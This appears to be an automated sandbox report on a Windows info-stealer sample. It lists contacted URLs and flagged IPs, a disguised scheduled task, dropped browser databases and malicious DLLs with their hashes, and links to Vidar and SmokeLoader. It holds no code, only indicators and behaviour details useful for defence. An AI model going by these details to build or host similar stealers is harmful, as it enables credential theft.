                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/workshop/kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://login.steampowered.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://steamcommunity.com/profiles/76561199689717899/badgeskat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.mozilla.org/products/firefoxgro.allF441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://store.steampowered.com/legal/kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://65.109.242.5976561199689717899[1].htm.9.drfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgkat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoF441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://65.109.242.59/NXkat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://rpi.net.au/~ajohnson/resourcehacker9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000000.2358201708.00000000004B4000.00000002.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://store.steampowered.com/76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  http://127.0.0.1:27060kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://steamcommunity.com/profiles/76561199689717899tSkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  23.145.40.124 | unknown | Reserved | 22631 | SURFAIRWIRELESS-IN-01US | true
                  104.102.42.29 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
                  188.114.96.3 | whispedwoodmoodsksl.shop | European Union | 13335 | CLOUDFLARENETUS | true
                  185.18.245.58 | unknown | Azerbaijan | 39232 | UNINETAZ | true
                  185.235.137.54 | unknown | Iran (ISLAMIC Republic Of) | 202391 | AFRARASAIR | false
                  65.109.242.59 | unknown | United States | 11022 | ALABANZA-BALTUS | false
                  91.202.233.231 | unknown | Russian Federation | 9009 | M247GB | true
                  190.28.110.209 | dbfhns.in | Colombia | 13489 | EPMTelecomunicacionesSAESPCO | true
                  45.129.96.86 | unknown | Estonia | 208440 | GMHOST-EE | true
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1447651
                  Start date and time: 2024-05-26 10:21:06 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 12m 34s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed: 16
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: 4.exe
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winEXE@14/35@7/9
                  EGA Information:
                  • Successful, ratio: 80%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 65
                  • Number of non-executed functions: 243
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.42.65.92
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target kat796E.tmp, PID 6620 because there are no executed functions
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes were analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  Time | Type | Description
                  04:22:00 | API Interceptor | 466341x Sleep call for process: explorer.exe modified
                  04:22:34 | API Interceptor | 8x Sleep call for process: F441.exe modified
                  04:23:16 | API Interceptor | 1x Sleep call for process: kat796E.tmp modified
                  04:23:25 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                  09:22:21 | Task Scheduler | Run new task: Firefox Default Browser Agent 3D6E4885768EAFE0 path: C:\Users\user\AppData\Roaming\sdveeeu
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.102.42.29http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                    file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                          https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                            https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                              Category:dropped
                                                                              Size (bytes):159744
                                                                              Entropy (8bit):0.7873599747470391
                                                                              Encrypted:false
                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                              Category:dropped
                                                                              Size (bytes):28672
                                                                              Entropy (8bit):2.5793180405395284
                                                                              Encrypted:false
                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):126976
                                                                              Entropy (8bit):0.47147045728725767
                                                                              Encrypted:false
                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9571
                                                                              Entropy (8bit):5.536643647658967
                                                                              Encrypted:false
                                                                              SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                              MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                              SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                              SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                              SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                              Malicious:false
                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):5242880
                                                                              Entropy (8bit):0.037963276276857943
                                                                              Encrypted:false
                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                              MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                              SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                              SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                              SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: CHA0VZiz8y.exe, Detection: malicious
                                                                              • Filename: jE4zclRJU2.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious
                                                                              • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: CHA0VZiz8y.exe, Detection: malicious
                                                                              • Filename: jE4zclRJU2.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious
                                                                              • Filename: BI6oo9z4In.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
